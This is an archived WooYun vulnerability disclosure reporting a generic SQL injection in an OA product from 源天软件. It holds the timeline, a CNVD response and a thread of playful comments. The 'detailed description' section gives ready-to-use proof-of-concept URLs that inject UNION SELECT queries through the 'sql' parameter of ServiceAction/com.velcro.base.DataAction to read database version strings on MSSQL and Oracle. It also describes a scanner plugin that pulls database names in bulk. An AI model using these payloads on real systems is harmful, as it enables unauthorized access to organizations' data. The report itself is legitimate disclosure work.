某OA通用型SQL注入漏洞(为支持TangScan而来)

漏洞概要

缺陷编号:WooYun-2015-0128521

漏洞标题:某OA通用型SQL注入漏洞(为支持TangScan而来)

相关厂商:源天软件

漏洞作者:Coody

提交时间:2015-07-25 00:08

公开时间:2015-10-25 20:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2015-07-25: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-07-30: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-20: 细节向核心白帽子及相关领域专家公开
2015-09-30: 细节向普通白帽子公开
2015-10-10: 细节向实习白帽子公开
2015-10-25: 细节向公众公开

简要描述:

首先. 支持TangScan.com是必须的
其次. 为写插件抛出一枚0day
最后. 夜观天象,貌似要下雨,不知会打雷不~~~

详细说明:

1)通用型SQL注入漏洞厂商:源天软件网址:http://**.**.**.**/漏洞链接:ServiceAction/com.velcro.base.DataAction说明:该oa系统使用mssql和oracle两个类型的数据库。案例分别给出两种类型的利用poc。利用POC:

漏洞证明(直接访问即可):

A)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=trueB)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=trueC)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

D)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=trueE)http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true2)说好的为了支持 TangScan 而来直接给出编写好的插件代码(本人代码盲,瞎写的,大牛勿喷),等公布时,该插件已经入库 TangS**.**.**.** 。

看下执行插件后的结果:

插件运行正常,能够顺利输出数据。。。。。。

测试中,直接执行 --mode exploit ,批量获取数据库名称吧。

测试完毕,看下结果文件 success.txt 内容

嗯、到这里该结束了···

漏洞证明:

修复方案:

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-2720:50

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商或网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 玉林嘎 白帽子 | Rank:757 漏洞数:64)

    为支持Coody而来

  2. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    为支持Coody而来

  3. 2010-01-01 00:00 boooooom 白帽子 | Rank:463 漏洞数:50)

    同学,我跟你说,我好喜欢你哦。

  4. 2010-01-01 00:00 Coody 白帽子 | Rank:1303 漏洞数:118)

    @xsser 求闪电劈死我吧。。。。哈哈。。。。我好贱。。。。

  5. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    为支持Coody而来

  6. 2010-01-01 00:00 浮萍 白帽子 | Rank:326 漏洞数:33)

    下雨了 未打雷

  7. 2010-01-01 00:00 地瓜 白帽子 | Rank:3 漏洞数:1)

    干的漂亮

  8. 2010-01-01 00:00 高小厨 白帽子 | Rank:910 漏洞数:71)

    为支持Coody而来

  9. 2010-01-01 00:00 PgHook 白帽子 | Rank:689 漏洞数:69)

    为支持Coody而来

  10. 2010-01-01 00:00 RedFree 白帽子 | Rank:191 漏洞数:25)

    为支持Coody而来

  11. 2010-01-01 00:00 Hello-mary 白帽子 | Rank:0 漏洞数:0)

    其次. 为写插件抛出一枚0day

  12. 2010-01-01 00:00 Wulala 白帽子 | Rank:201 漏洞数:17)

    天不刮风,天不下雨,天上有太阳.

  13. 2010-01-01 00:00 小胖子 白帽子 | Rank:1429 漏洞数:107)

    大贱人,哼

  14. 2010-01-01 00:00 保护伞 白帽子 | Rank:150 漏洞数:13)

  15. 2010-01-01 00:00 BeenQuiver 白帽子 | Rank:50 漏洞数:6)

    插件逻辑很简单嘛没有任何算法可言,就是看正则,验证的准确率。